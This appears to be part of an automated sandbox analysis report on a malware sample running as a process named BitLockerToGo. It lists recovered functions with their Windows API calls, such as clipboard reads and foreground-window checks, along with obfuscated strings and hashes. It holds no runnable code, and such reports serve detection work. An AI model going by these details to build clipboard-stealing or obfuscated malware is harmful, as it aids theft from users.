Instruction Fuzzy Hash: 0321B675A042869FDB04CFA8D89066EBBB1BF46305F64446DD441B7342CB34EA11CFA9

Function 004472D8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0044732F

Strings

BsD, xrefs: 00447335

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID: BsD
API String ID: 3298025750-4194053888
Opcode ID: 9eea13083a11233604bab50024f87e60bcd6812821ad9ab65914b760a1b1719d
Instruction ID: b4a8d77d97505ad0b43bab05d6cc30378e05db1245e5d0bdcce16c4d7c5ed146
Opcode Fuzzy Hash: 9eea13083a11233604bab50024f87e60bcd6812821ad9ab65914b760a1b1719d
Instruction Fuzzy Hash: 94018734D00144EBEB128F88D840A9DFB70EB0A302F0085A6E810A7252C738EA21CB98

Function 0044A57B Relevance: 3.0, APIs: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0044A57B
GetForegroundWindow.USER32 ref: 0044A590

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 7a1f5af49a56723d3a6e11a62483c4a5a83d732bc32348e721c9bf6a03ad5cca
Instruction ID: d402a4adc5d7c473a33cb4a4aa799d290fabcbb65b657d1932be6024aeb953e7
Opcode Fuzzy Hash: 7a1f5af49a56723d3a6e11a62483c4a5a83d732bc32348e721c9bf6a03ad5cca
Instruction Fuzzy Hash: C7D0A7F19126846B9304F762BC1A45E3226DB4330B304403FE40302217EE25E143C64E

Function 00449AD0 Relevance: 1.6, APIs: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 00449BA5

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2e22a688bfbe6fdb48a4b3709ceedf52b7f9f0d2de51921409c4355d52e01f3e
Instruction ID: d8a53b2db85cd516d02feb48601cfdd3156edd6e9b6f8266084c13ac6cd78d02
Opcode Fuzzy Hash: 2e22a688bfbe6fdb48a4b3709ceedf52b7f9f0d2de51921409c4355d52e01f3e
Instruction Fuzzy Hash: FE210234508241EFD3119F14ED54A1BBBB8FF8A702F00087DE98157212EB39EC11DBAA

Function 0044728C Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 00447296

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a1ec82bd7c4a094af154a6bbba313a3ef34f65f742f73693adaafe800a3f6075
Instruction ID: 1ca0555867aebcd2be95a47e4b5eb530612a095893a6f7765936c594932e3e14
Opcode Fuzzy Hash: a1ec82bd7c4a094af154a6bbba313a3ef34f65f742f73693adaafe800a3f6075
Instruction Fuzzy Hash: 83B00230145615BEF17117115DD5F7F1D6CDF43E95F100158B204280D14E549402D5BD

Non-executed Functions

Function 0041FEC1 Relevance: 41.2, Strings: 32, Instructions: 1177COMMON

Download Yara Rule

Strings

lmjk, xrefs: 00420674
4pI, xrefs: 00420A61, 00420A68
HIFG, xrefs: 004206D7
PQ./, xrefs: 00420719
LMJK, xrefs: 004206CC
pqNO, xrefs: 004206C1
$, xrefs: 004209D8
|}z{, xrefs: 004206A0
hifg, xrefs: 0042067F
8967, xrefs: 0042075B
,-*p, xrefs: 00420724
zed, xrefs: 00420745
Gy, xrefs: 0042101B
turs, xrefs: 004206B6
7W2Q, xrefs: 00420DAA
?>98, xrefs: 0042068A
Y|, xrefs: 00421074
4523, xrefs: 00420766
\]Z[, xrefs: 004206F8
DEBC, xrefs: 004206E2
()&|, xrefs: 0042072F
@A^_, xrefs: 004206ED
[ZED, xrefs: 0042079D
p, xrefs: 004207DF
|_"Y, xrefs: 00420D94
I], xrefs: 00420899
#"-,, xrefs: 004206AB
kjUT, xrefs: 004207E7
PS, xrefs: 00420DB5
ONIH, xrefs: 004207BE
g=:;, xrefs: 00420750
XYVW, xrefs: 00420703

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: zed$#"-,$$$()&|$,-*p$4523$7W2Q$8967$?>98$@A^_$DEBC$Gy$HIFG$LMJK$ONIH$PQ./$PS$XYVW$Y|$[ZED$\]Z[$g=:;$hifg$kjUT$lmjk$p$pqNO$turs$|_"Y$|}z{$ I]$4pI
API String ID: 2994545307-66204514
Opcode ID: 10dda4ef380e47c778973b51f1cd27b35615308e8b8019f84fdc1ad88b463809
Instruction ID: ef57e6f605910ecfc3e83bfc214bd678a5ab84342c79521411dc9faf2bea928f
Opcode Fuzzy Hash: 10dda4ef380e47c778973b51f1cd27b35615308e8b8019f84fdc1ad88b463809
Instruction Fuzzy Hash: B2A2ACB16083909FE730CF15D840BABBBE2BFC5344F94491EE5889B392D739A911CB56

Function 0042B820 Relevance: 23.6, Strings: 18, Instructions: 1134COMMON

Download Yara Rule

Strings

]>_, xrefs: 0042BB5F
{u, xrefs: 0042BE08
!#, xrefs: 0042C614
?Z=, xrefs: 0042C459
<;, xrefs: 0042C46B
!u%w, xrefs: 0042B865
!y){, xrefs: 0042B844
\], xrefs: 0042BFA6
>s;q, xrefs: 0042C1EE
!e!g, xrefs: 0042B839
pq, xrefs: 0042CB97
4), xrefs: 0042C609
d?O=, xrefs: 0042C11D
>8, xrefs: 0042C62A
[O, xrefs: 0042BDF2
#;, xrefs: 0042C61F
mu, xrefs: 0042C099
HI, xrefs: 0042C8BA

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?Z=$!e!g$!u%w$!y){$!#$#;$4)$<;$>s;q$>8$HI$[O$\]$d?O=$mu$pq${u$]>_
API String ID: 0-1940930697
Opcode ID: 705b27fbc228cbda6945b52d7956ad7818a933b8b3350de79be5fdcf195c6e53
Instruction ID: cdc34f34dfad23855bb7e64d2bb9246b831472589d28b1d1cdd6309bbc08d915
Opcode Fuzzy Hash: 705b27fbc228cbda6945b52d7956ad7818a933b8b3350de79be5fdcf195c6e53
Instruction Fuzzy Hash: 0EB26EB55083828BD734CF15E980BAFBBE1FB95304F848D2DE5C99B241EB349845CB96

Function 0042AED0 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 445COMMON

Download Yara Rule

Strings

s}, xrefs: 0042B493
-Y'[, xrefs: 0042B357
_=L?, xrefs: 0042B30F
xy, xrefs: 0042B397
3E(G, xrefs: 0042B31F
#U)W, xrefs: 0042B33F
<AtC, xrefs: 0042B327
>I&K, xrefs: 0042B337
O9I;, xrefs: 0042B3F0, 0042B3F4
#Q1S, xrefs: 0042B347
+]+_, xrefs: 0042B34F
@Q, xrefs: 0042B234, 0042B23D

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: #Q1S$#U)W$+]+_$-Y'[$3E(G$<AtC$>I&K$@Q$O9I;$_=L?$xy$s}
API String ID: 0-1885124479
Opcode ID: 75f65ae0f0069f802cbd86ed60e3049bdad50c5dec991297fb74595099d45746
Instruction ID: 7a2f3a3ec0d3a64ef6d1d7f0bba6bdc8b08265c93fa8126ab8747a5c3b927ce5
Opcode Fuzzy Hash: 75f65ae0f0069f802cbd86ed60e3049bdad50c5dec991297fb74595099d45746
Instruction Fuzzy Hash: 250230B0608340ABD310DF55E980A2BBBF4EB86B48F90491DF5C59B252D379D905CBAB

Function 00442BB0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 422memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00442C0C
SysAllocString.OLEAUT32 ref: 00442CD3
VariantInit.OLEAUT32(00000000), ref: 00442D4A
SysStringLen.OLEAUT32(00000000), ref: 00442E0B

Strings

4cb}, xrefs: 00442BB8
g5a, xrefs: 00442BE4
@/x-, xrefs: 00442C2E
L+`), xrefs: 00442C36

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: String$Alloc$InitVariant
String ID: g5a$4cb}$@/x-$L+`)
API String ID: 3520221836-1770350496
Opcode ID: 3d02a42fccdb70e53781a704f6dc48ead2b5e4ec7dd2c7e2e949c7e4d1b9ab05
Instruction ID: c386c4c01a5d3d1e2a44526f7a107333af5f4f1e0497d9d0873a975d8c396805
Opcode Fuzzy Hash: 3d02a42fccdb70e53781a704f6dc48ead2b5e4ec7dd2c7e2e949c7e4d1b9ab05
Instruction Fuzzy Hash: B3E1C971A083019FE7048F24D881B6FBBE5FF89315F54892DF489872A2C779D849CB46

Function 0042BA04 Relevance: 19.8, Strings: 15, Instructions: 1039COMMON

Download Yara Rule

Strings

]>_, xrefs: 0042BB5F
{u, xrefs: 0042BE08
!#, xrefs: 0042C614
?Z=, xrefs: 0042C459
<;, xrefs: 0042C46B
\], xrefs: 0042BFA6
>s;q, xrefs: 0042C1EE
pq, xrefs: 0042CB97
4), xrefs: 0042C609
d?O=, xrefs: 0042C11D
>8, xrefs: 0042C62A
[O, xrefs: 0042BDF2
#;, xrefs: 0042C61F
mu, xrefs: 0042C099
HI, xrefs: 0042C8BA

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?Z=$!#$#;$4)$<;$>s;q$>8$HI$[O$\]$d?O=$mu$pq${u$]>_
API String ID: 0-1182507494
Opcode ID: 017e682ae4c5dd138889befa84cc8a50595d4d680d1358546c2711a2ed902b59
Instruction ID: fe4bc79c0c593b620c3afce36e44e7e8ae430601631cd7183b664bf5497eb66d
Opcode Fuzzy Hash: 017e682ae4c5dd138889befa84cc8a50595d4d680d1358546c2711a2ed902b59
Instruction Fuzzy Hash: 56A25FB55083928BD334CF15D980BAFBBE1BB85304F848D2DE5C99B251EB349849CB97

Function 0040FB30 Relevance: 17.9, Strings: 14, Instructions: 396COMMON

Download Yara Rule

Strings

o/^-, xrefs: 0040FC02
\+^), xrefs: 0040FC0A
L=W?, xrefs: 0040FCE4
zkji, xrefs: 0040FC8A
89, xrefs: 0040FCEC
'[(Y, xrefs: 0040FC6A
W?O=, xrefs: 0040FC22
wdyk, xrefs: 0040FE03, 0040FE0B
(S)Q, xrefs: 0040FC7A
xtpr, xrefs: 0040FB42
_'[%, xrefs: 0040FC12
6K;I, xrefs: 0040FC4A
%W'U, xrefs: 0040FC72
,o}m, xrefs: 0040FC82

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %W'U$'[(Y$(S)Q$,o}m$6K;I$89$L=W?$W?O=$\+^)$_'[%$o/^-$wdyk$xtpr$zkji
API String ID: 0-1708957851
Opcode ID: 0363bb4e98395b0122dbd805bba1c4e034a0c65ce009ee3438f75f3d2936b76e
Instruction ID: 22cbf46fe55eaa78288be7360f990a78965d802d7404b42cb09442a4e05000c4
Opcode Fuzzy Hash: 0363bb4e98395b0122dbd805bba1c4e034a0c65ce009ee3438f75f3d2936b76e
Instruction Fuzzy Hash: 93D18A7010C3818BC321DF14D494A5FBBE1AF96748F18092EE4D59B392D37AD989CB9B

Function 0043BE60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0043BE70
GetWindowLongW.USER32 ref: 0043BE95
GetClipboardData.USER32 ref: 0043BEA7
GlobalLock.KERNEL32 ref: 0043BEC6
GlobalUnlock.KERNEL32 ref: 0043BFB4
CloseClipboard.USER32 ref: 0043BFBD

Strings

_, xrefs: 0043BEF6
e, xrefs: 0043BF37

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: _$e
API String ID: 2832541153-1418839278
Opcode ID: 143534af7c4ffe21c205999b3d3a80ddc29012e0fd5c0269c95b3afdaad660db
Instruction ID: 6a681664c03b22173681f1a99f6825af62480db13644b42d15afeedfa53e07ff
Opcode Fuzzy Hash: 143534af7c4ffe21c205999b3d3a80ddc29012e0fd5c0269c95b3afdaad660db
Instruction Fuzzy Hash: 55416E7110C3828ED301EF3C884436EBFE0DB96325F045E6EE5E586292C37885498BE7

Function 00412E83 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 485COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004132D6

Strings

F?>1, xrefs: 00413176
G%E, xrefs: 00412E90
J@>, xrefs: 004133B7, 004133C6
s{, xrefs: 004130E7
f, xrefs: 004134B2
(), xrefs: 00413208

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: DirectorySystem
String ID: ()$F?>1$G%E$J@>$f$s{
API String ID: 2188284642-3165983574
Opcode ID: b37b8522b0c75984ed691f458ff81fbd3548fe33b8393b57209fff126c7db7aa
Instruction ID: 4b9612c523b3145c2e364ba352413c754e3dd8f2e3267da82c09d80f02cfc312
Opcode Fuzzy Hash: b37b8522b0c75984ed691f458ff81fbd3548fe33b8393b57209fff126c7db7aa
Instruction Fuzzy Hash: 60027DB440C3C08AD3B09F159494BEFBBF9AF86709F14486EE4C887252DB399589CB57

Function 00401000 Relevance: 10.6, Strings: 7, Instructions: 1857COMMON

Download Yara Rule

Strings

gfff, xrefs: 00402394
A, xrefs: 00402320
0123456789abcdefxp, xrefs: 0040148C, 004014F8
-, xrefs: 00402340
gfff, xrefs: 00402453
0123456789ABCDEFXP, xrefs: 00401482, 004014EB
gfff, xrefs: 00402407

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$A$gfff$gfff$gfff
API String ID: 0-947532036
Opcode ID: 9791b1bf74c8368241d5177bd6d9f2d36ee097b5ed14c6af308b7d864414a93c
Instruction ID: 2464d56511352558bb372515f83766d2fa27be09c42da7a1f90046a62c1134b8
Opcode Fuzzy Hash: 9791b1bf74c8368241d5177bd6d9f2d36ee097b5ed14c6af308b7d864414a93c
Instruction Fuzzy Hash: 29D216716083518FC718CE29C49426BBBE2AFC9314F18863EE895AB3D1D779DD05CB86

Function 004357A6 Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 703libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 00436993

Strings

z\B&, xrefs: 004366E1
WU_N, xrefs: 00436E01
p`|3, xrefs: 004367F8

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID: WU_N$p`|3$z\B&
API String ID: 1029625771-3354841702
Opcode ID: 540ed98289425b098511327cef7d68411752c09261efa191220f69b53ac9d28f
Instruction ID: 2b2848666c1624ce62d859ab252c4d86e9047d0ffe921fd0e57d2caf2480d4dc
Opcode Fuzzy Hash: 540ed98289425b098511327cef7d68411752c09261efa191220f69b53ac9d28f
Instruction Fuzzy Hash: EE426E70509B819AE761CF35C450BE3BBE1AF1A305F44985ED0EE8B282DB39B449CB65

Function 0043665F Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 623COMMON

Download Yara Rule

Strings

z\B&, xrefs: 004366E1
WU_N, xrefs: 00436E01
p`|3, xrefs: 004367F8

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: WU_N$p`|3$z\B&
API String ID: 0-3354841702
Opcode ID: ed2a297d60cc8638b48046dc535b40244c90757c8a5af7198d69468110c2e2ef
Instruction ID: eec2916b454547cc5e65301e223f9244c16fddbc1d29e14f459097164b744a90
Opcode Fuzzy Hash: ed2a297d60cc8638b48046dc535b40244c90757c8a5af7198d69468110c2e2ef
Instruction Fuzzy Hash: 7C227070409B819AE761CF35C850BE3BBE1AF1B305F44589ED4EE8B282DB39B449CB55

Function 0042E6DC Relevance: 9.2, Strings: 7, Instructions: 425COMMON

Download Yara Rule

Strings

2a/c, xrefs: 0042E73C
q=q?, xrefs: 0042E6E4
q9i;, xrefs: 0042E6EC
;e'g, xrefs: 0042E734
T1`3, xrefs: 0042E864
=:;8, xrefs: 0042EBC3, 0042EBCB
7B, xrefs: 0042ED23

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2a/c$7B$;e'g$=:;8$T1`3$q9i;$q=q?
API String ID: 0-2363977868
Opcode ID: 4c581fbf646d13efd7b45823a580e7a3db4c48ee432dfb2a62c060ed27f50deb
Instruction ID: d629141cb3f03e07089362ca9a1441ae7e21739e92d3f917c56c127f8917a745
Opcode Fuzzy Hash: 4c581fbf646d13efd7b45823a580e7a3db4c48ee432dfb2a62c060ed27f50deb
Instruction Fuzzy Hash: B8E169B4518340EBE7209F16E881B1BBBF5FB85344F948D2DE1C88B262E735D854CB5A

Function 004012BF Relevance: 8.5, Strings: 6, Instructions: 960COMMON

Download Yara Rule

Strings

0, xrefs: 00401DE1
i, xrefs: 00402893
d, xrefs: 00401D53
0, xrefs: 00401E11
0, xrefs: 00402065
@, xrefs: 00402216

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$0$0$@$d$i
API String ID: 0-2683514064
Opcode ID: edfff0084b8f513b193c783db33119dc38fb6c1bcc7fd51e1f9ae193e96cdd54
Instruction ID: 5cf0baaf5ee61bbc4e62fcb802246859eaf4ef5e713bfefcaebf2b2e2c5befb2
Opcode Fuzzy Hash: edfff0084b8f513b193c783db33119dc38fb6c1bcc7fd51e1f9ae193e96cdd54
Instruction Fuzzy Hash: 6172F171A083528FC718CE28C58436BBBE1AB85314F188A3EE8D5A73D1D779DD05CB86

Function 0042A2AF Relevance: 8.0, Strings: 6, Instructions: 499COMMON

Download Yara Rule

Strings

jlh`, xrefs: 0042A35F
mik], xrefs: 0042A36F
{VcQ, xrefs: 0042A438, 0042A403
7Eps, xrefs: 0042A39F
4, xrefs: 0042A3C7
u)fd, xrefs: 0042A367

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4$7Eps$jlh`$mik]$u)fd${VcQ
API String ID: 0-3422695248
Opcode ID: a35efd440aeb5fecf11ae34ad7f85432a62d7e86535adef876224ff4e9054cd8
Instruction ID: 46406b8ad6a57781930909c6630483f9c3fa8c84e416afc6494688a078bc3098
Opcode Fuzzy Hash: a35efd440aeb5fecf11ae34ad7f85432a62d7e86535adef876224ff4e9054cd8
Instruction Fuzzy Hash: 5C02F331608751DFD304DF29E8A062AB7F2FF89305F98892CE591873A2D734E865CB46

Function 00401532 Relevance: 7.9, Strings: 6, Instructions: 432COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 0040153C
gfff, xrefs: 00402590
gfff, xrefs: 004025A5
+, xrefs: 00402557
0123456789ABCDEFXP, xrefs: 00401532
gfff, xrefs: 004025F1

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-925659942
Opcode ID: b25c884cc69ad364466dab053ef21c290cacd50368c448e8b82566a63b0e84e8
Instruction ID: a6ffe669dcd79ed5bd4c0e17f58666f859a3756aeede9868dd3492272049ef0e
Opcode Fuzzy Hash: b25c884cc69ad364466dab053ef21c290cacd50368c448e8b82566a63b0e84e8
Instruction Fuzzy Hash: AAE10571A083528FC718CE28C59426BBBE2AFD4304F18893EE8D5A73D1D779D905CB86

Function 0040134F Relevance: 7.9, Strings: 6, Instructions: 389COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 00401359
gfff, xrefs: 00402590
gfff, xrefs: 004025A5
-, xrefs: 00402560
0123456789ABCDEFXP, xrefs: 0040134F
gfff, xrefs: 004025F1

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-854689426
Opcode ID: 563dea3a221a80b6badf4134c6b3051b281c18b74404b7bdbbbb3a1f44d0c9ad
Instruction ID: ea815c49ea9d269a0fd0827539707e9efb2465f82e885e04462e8e82841b39b2
Opcode Fuzzy Hash: 563dea3a221a80b6badf4134c6b3051b281c18b74404b7bdbbbb3a1f44d0c9ad
Instruction Fuzzy Hash: B3D1F7316087928FC719CE29C49026AFBE2AFD5314F0CCA6EE8D5973D1D279D905CB86

Function 004235D0 Relevance: 5.5, Strings: 4, Instructions: 545COMMON

Download Yara Rule

Strings

JXCJ, xrefs: 00423673, 0042367B
E, xrefs: 00423729
(, xrefs: 00423821
JXCJ, xrefs: 00423881, 0042378B

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ($JXCJ$JXCJ$E
API String ID: 0-1247320388
Opcode ID: 80c1ac81dcd13ed24ac06af6e307a2dd1f835ad0b8aba39134792eb5c1886df0
Instruction ID: fa7d2e3fdd44ea16064ab6412d3432d77c3913291e7fae62452c4ae9e23b8fc3
Opcode Fuzzy Hash: 80c1ac81dcd13ed24ac06af6e307a2dd1f835ad0b8aba39134792eb5c1886df0
Instruction Fuzzy Hash: 5F029EB1608350ABD300EF15D841A6FBBF4EF95348F54492DF5C497292D339EA148B9B

Function 00436067 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277COMMON

Download Yara Rule

Strings

X,fX, xrefs: 004361C4
<9>, xrefs: 004360DB

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: <9>$X,fX
API String ID: 0-3946491919
Opcode ID: 365bbb070e4f94233ece84fb9632ddb2b068ba1d308766f8353f2ff1bb045b43
Instruction ID: 9642b7786f0616e9e4315b322e2d3fc3693ffc9e7c815acd61792701ab147d08
Opcode Fuzzy Hash: 365bbb070e4f94233ece84fb9632ddb2b068ba1d308766f8353f2ff1bb045b43
Instruction Fuzzy Hash: F9A18E70104B819AE7A18F358450BE3BBF0BF16305F44989DE4EECB282DB39A449CB55

Function 00435908 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

X,fX, xrefs: 004361C4
<9>, xrefs: 004360DB

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: <9>$X,fX
API String ID: 0-3946491919
Opcode ID: 68b34a845b5c8c75df83091ced8d60b0592791cff4e7f6ce33a41c21c83f5c08
Instruction ID: 38542d89a96c659d48a7af6ed903a722968c801777711c12530f1cc5b9c476a9
Opcode Fuzzy Hash: 68b34a845b5c8c75df83091ced8d60b0592791cff4e7f6ce33a41c21c83f5c08
Instruction Fuzzy Hash: 6EA18E70104B419AE7B18F358450BE3BBF0BF16305F54989EE4EECB282DB3AA449CB55

Function 0043600B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

X,fX, xrefs: 004361C4
<9>, xrefs: 004360DB

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: <9>$X,fX
API String ID: 0-3946491919
Opcode ID: dd9ee0764a8ff7f14c12e4120e0bea0bc4bf551098247e5769afd026c421fc2a
Instruction ID: 2942592f1d6a4ccc28db3567ca2b8ce8f6b978f92970121fb2e49c9e58937f50
Opcode Fuzzy Hash: dd9ee0764a8ff7f14c12e4120e0bea0bc4bf551098247e5769afd026c421fc2a
Instruction Fuzzy Hash: 4E918F70004B419AE7B18F358450BE3BBF0BF16305F54989EE4EE9B282DB3AA449CB55

Function 00422B40 Relevance: 5.4, Strings: 4, Instructions: 372COMMON

Download Yara Rule

Strings

`a, xrefs: 00422DE7
2/B, xrefs: 00422F2C
;:9, xrefs: 00422EE3, 00422EEB
LM, xrefs: 00422C25

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2/B$LM$`a$;:9
API String ID: 0-1216481537
Opcode ID: 25888ab072a31fc874328066d2a91dfb89cc96a6ffed6d98c579b2892ed8daba
Instruction ID: 6b73ff7f886f98d24e44b4460c85888a9508218128f96f2d84b396722e914746
Opcode Fuzzy Hash: 25888ab072a31fc874328066d2a91dfb89cc96a6ffed6d98c579b2892ed8daba
Instruction Fuzzy Hash: FDA198705183509BC7109F18D891B2BB7F0FF96364F948A4DE8D58B3A1E379D901CBAA

Function 00422210 Relevance: 5.3, Strings: 4, Instructions: 286COMMON

Download Yara Rule

Strings

T[, xrefs: 0042241F
_], xrefs: 0042223B
`c, xrefs: 004222D9
SQ, xrefs: 00422243

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: T[$`c$SQ$_]
API String ID: 0-2924827632
Opcode ID: 2e30f9b80b199b882e282ec32b90202ca212531dc6563bc9d7bcf428ae19cc36
Instruction ID: 852edb32373e95745c2cbfe3ab64378e51527df196f87a32cf3186b4ef50fa22
